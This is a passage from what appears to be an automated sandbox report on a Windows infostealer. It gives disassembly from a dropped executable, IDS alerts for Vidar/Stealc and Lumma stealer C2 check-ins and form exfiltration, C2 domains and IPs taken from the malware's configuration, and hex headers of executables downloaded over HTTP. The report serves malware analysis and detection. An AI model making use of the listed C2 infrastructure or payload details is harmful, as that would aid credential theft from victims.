Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	10_2_00D5B56A
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	10_2_00D736C7
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	10_2_00D31878
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h	10_2_00D73833
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	10_2_00D55824
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	10_2_00D71918
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	10_2_00D5DA58
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	10_2_00D59BA8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D59BA8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h	10_2_00D59BA8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp eax	10_2_00D57B48
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [edx], ax	10_2_00D57B69
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	10_2_00D5BB20
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	10_2_00D43CBA
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D75C62
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp eax	10_2_00D55C1B
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	10_2_00D3DDC4
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	10_2_00D33D78
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov edi, ecx	10_2_00D41D02
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov ecx, dword ptr [edx]	10_2_00D2DED8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	10_2_00D43E69
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	10_2_00D5FFD5
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D39FE8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D39FE8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp ecx	10_2_00D35FB0
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	10_2_00D5FF74
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then dec ebx	10_2_00D6BF08

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49742 -> 95.164.90.97:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.164.90.97:80 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.164.90.97:80 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:53642 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:53641 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:53641 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:53640 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:53640 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: isoplethui.sbs
Source: Malware configuration extractor	URLs: frizzettei.sbs
Source: Malware configuration extractor	URLs: laddyirekyi.sbs
Source: Malware configuration extractor	URLs: invinjurhey.sbs
Source: Malware configuration extractor	URLs: bemuzzeki.sbs
Source: Malware configuration extractor	URLs: exilepolsiy.sbs
Source: Malware configuration extractor	URLs: exemplarou.sbs
Source: Malware configuration extractor	URLs: wickedneatr.sbs
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.4:51630 -> 162.159.36.2:53

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:27 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:34 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:35 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:35 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:36 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:37 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 